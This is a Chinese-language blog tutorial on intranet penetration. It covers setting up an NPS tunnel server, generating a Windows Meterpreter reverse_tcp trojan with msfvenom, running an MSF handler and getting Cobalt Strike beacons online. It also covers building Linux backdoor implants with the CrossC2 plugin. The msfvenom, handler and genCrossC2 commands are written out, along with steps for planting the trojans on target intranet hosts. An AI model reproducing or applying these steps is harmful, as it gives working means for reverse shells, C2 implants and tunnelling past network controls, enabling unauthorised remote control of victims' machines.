当前位置: 首页 > news >正文

内网安全-隧道搭建穿透上线内网穿透-nps自定义上线内网渗透-Linux上线-cs上线Linux主机

目录

  • 内网安全-隧道搭建&穿透上线
    • 内网穿透-nps-自定义-上线
      • NPS工具介绍
        • 搭建过程
      • nps原理介绍
      • MSF上线
      • CS上线
    • 内网渗透-Linux上线-cs上线Linux主机
      • 1.下载插件
      • 2.导入插件模块
      • 3.配置监听器
      • 4.服务端配置
      • 5.配置C2监听器并生成木马
      • 6.执行木马

内网安全-隧道搭建&穿透上线

内网穿透:解决网络控制上线&网络通讯问题 隧道技术:解决不出网协议上线的问题(利用出网协议进行封装出网) 代理技术:解决网络通讯不通的问题(利用跳板机建立节点后续操作) 

内网穿透-nps-自定义-上线

NPS工具介绍

	一款轻量级、高性能、功能强大的内网代理服务器。支持tcp、udp、socks5、http等几乎所有流量转发,可用于访问内网网站、支付本地接口调试、ssh访问、远程桌面,内网dns解析、内网socks5代理等等……,并带有功能强大的web管理端。一个轻量级、高性能、强大的内网穿透代理服务器,带有强大的web管理端。项目地址:https://github.com/ehang-io/nps
搭建过程

一、访问项目地址,将服务端和客户端所对应的包进行下载(windows或Linux版本)

以Linux版本为例

image-20240528191603774

下载完成后将服务端的包在服务器进行解压即可,解压完成后即可得到nps文件,如果没有可执行权限,赋予即可使用chmod命令。

image-20240528191731192

安装命令:

./nps install

运行命令:

./nps
//初始用户为admin,密码为123
//可通过配置文件自定义修改nps.conf

image-20240528192047751

运行状态:

image-20240528191916627

访问服务器地址:8080即可,搭建完成。

image-20240528192116799

nps原理介绍

	运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道,可以映射云服务器上的某个端口到客户端主机的指定端口,其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口,实现内网穿透效果。

image-20230915011011277

MSF上线

一、服务端nps在客户端选项处,新增客户端

image-20240528192652552

二、将下载下的客户端解压完成后,执行客户端命令即可,然后在服务端可看到客户端的连接状态

image-20240528192441705

三、执行客户端命令,建立连接

image-20240528192808615

四、服务端更新,客户端显示在线

image-20240528192842663

五、隧道建立

image-20240528193025776

image-20240528193050827

六、生成木马

msfvenom -p windows/meterpreter/reverse_tcp LHOST=nps服务器ip LPORT=服务端转发端口 -f exe -o nps.exe

image-20240528193239962

七、kali 开启MSF开启监听

msf6 > use exploit/multi/handler 
[*] Using configured payload generic/shell_reverse_tcp
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set lhost 0.0.0.0
lhost => 0.0.0.0
msf6 exploit(multi/handler) > set lport 8888
lport => 8888
msf6 exploit(multi/handler) > run

image-20240528193433335

八、将木马放到目标内网主机当中,执行即可

image-20240528193627502

九、成功上线MSF。观察发现本地8888端口。

	运行NPS服务的云服务器和运行NPS客户端的主机之间会创建一条TCP或UDP隧道,可以映射云服务器上的某个端口到客户端主机的指定端口,其他主机访问云服务器的这个端口的流量都会通过创建的这条隧道转发到映射的主机端口,实现内网穿透效果。

image-20240528193752778

image-20240528194325048

CS上线

nps配置步骤和MSF上线一致。

cs配置,创建两个监听器,生成木马即可。

一、nps服务器转发配置监听

image-20240528195015709

二、内网上线主机配置监听

image-20240528195156995

image-20240528195225315

三、生成木马即可

image-20240528195348454

四、将木马上传到目标内网机当中,执行,成功上线

image-20240528195536791

image-20240528195630525

image-20240528200119114

image-20240528200134299

内网渗透-Linux上线-cs上线Linux主机

1.下载插件

	crossC2主要面向企业自身及红队人员的安全评估框架,支持CobaltStrike对其他平台(Linux/MacOS/…)的安全评估,支持自定义模块,及包含一些常用的渗透模块。

插件地址:Release v3.3 - stable · gloxec/CrossC2 (github.com)

image-20240528201531585

2.导入插件模块

将下载下来的.cna导入到脚本管理器当中即可,然后进行加载。

image-20240528201657160

成功加载后,建议重启CS服务。

3.配置监听器

由于插件只支持HTTPS与TCP,所以选择的监听为HTTPS。

image-20240528202054260

4.服务端配置

	将下载下来的结尾是.Linux的文件导入到服务器中,注意需要导入到CS目录下,并赋予执行权限。chmod u+x genCrossC2.Linux

image-20240528202725059

5.配置C2监听器并生成木马

此处两种方法:(1)图形化界面选择完成后,复制生成的命令。(2)命令行直接生成。

 当在之前加载的插件后,就会出现这个CroseC2了,建议将.Linux文件上传到服务端并添加执行权限后,最好是重启以下CS客户端。这里选择HTTPS的选项。

image-20240528202140421

生成Linux后门木马。

隐藏文件在服务端通过ls -la可查看

image-20240528202928464

image-20240528202408051

点击生成以后,在cs端日志处会出现以下的信息

image-20240528203118373

将此内容复制,然后在服务端执行即可。

建议在cs目录下执行,去除前面的绝对路径。

image-20240528203218993

注意:如果不能执行,出现问题,若日志显示出现MacOS系统内容,则是没有修改.cna文件的问题,修改.cna文件即可

	找到cna文件,就是之前加载的cna插件文件,修改里面的地址,地址是cs文件夹,下面的是系统文件,也就是刚刚下载的.Linux文件名字,其它的是不需要修改的。修改后,要将CS客户端重启。

image-20240528203546955

修改完成以后,再次重新生成木马即可。

或此处生成Linux木马,可直接执行命令即可生成。可不用上面的图形化界面操作。如果命令不理解可继续选择上述图形化操作,最后复制命令即可。

./genCrossC2.Linux 服务器ip 监听端口 ./.cobaltstrike.beacon_keys null Linux x64 后门名称

6.执行木马

将生成的linux木马上传到目标服务器,执行即可

成功上线

image-20240528204105093

文件浏览

image-20240528204123498

文章不妥之处,欢迎批评指正!

相关文章:

  • 微信生态系统介绍
  • Android 待办类应用提醒功能的实现及其问题
  • ⌈ 传知代码 ⌋ 高速公路车辆速度检测软件
  • 全同态加密生态项目盘点:FHE技术的崛起以及应用
  • 编译链接问题
  • 面试的内容
  • java面试(多线程)
  • Canny算子
  • 幼儿园老师投稿渠道
  • 01 一文理解,Prometheus详细介绍
  • Java-Stream流-概述、创建、使用:遍历/匹配、筛选、聚合、映射、归约、排序、提取/组合
  • LeetCode hot100-51-G
  • iOS--工厂设计模式
  • Linux基础知识,配置网卡(七)
  • 【算法】位运算算法——两整数之和
  • 9月CHINA-PUB-OPENDAY技术沙龙——IPHONE
  • Android 架构优化~MVP 架构改造
  • CNN 在图像分割中的简史:从 R-CNN 到 Mask R-CNN
  • exif信息对照
  • HomeBrew常规使用教程
  • Java Agent 学习笔记
  • Linux Process Manage
  • linux安装openssl、swoole等扩展的具体步骤
  • MySQL QA
  • PHP 7 修改了什么呢 -- 2
  • RxJS 实现摩斯密码(Morse) 【内附脑图】
  • Spark VS Hadoop:两大大数据分析系统深度解读
  • ubuntu 下nginx安装 并支持https协议
  • WinRAR存在严重的安全漏洞影响5亿用户
  • 深入体验bash on windows,在windows上搭建原生的linux开发环境,酷!
  • 世界上最简单的无等待算法(getAndIncrement)
  • 第二十章:异步和文件I/O.(二十三)
  • 哈罗单车融资几十亿元,蚂蚁金服与春华资本加持 ...
  • 直播平台建设千万不要忘记流媒体服务器的存在 ...
  • ​如何使用QGIS制作三维建筑
  • #LLM入门|Prompt#3.3_存储_Memory
  • #QT 笔记一
  • %@ page import=%的用法
  • (2024,LoRA,全量微调,低秩,强正则化,缓解遗忘,多样性)LoRA 学习更少,遗忘更少
  • (21)起落架/可伸缩相机支架
  • (Matalb回归预测)PSO-BP粒子群算法优化BP神经网络的多维回归预测
  • (超详细)2-YOLOV5改进-添加SimAM注意力机制
  • (附源码)springboot工单管理系统 毕业设计 964158
  • (九十四)函数和二维数组
  • (十) 初识 Docker file
  • (一)项目实践-利用Appdesigner制作目标跟踪仿真软件
  • **python多态
  • .bat批处理(八):各种形式的变量%0、%i、%%i、var、%var%、!var!的含义和区别
  • .dwp和.webpart的区别
  • .NET 表达式计算:Expression Evaluator
  • .Net6 Api Swagger配置
  • .Net程序帮助文档制作
  • .Net接口调试与案例
  • .project文件
  • @Service注解让spring找到你的Service bean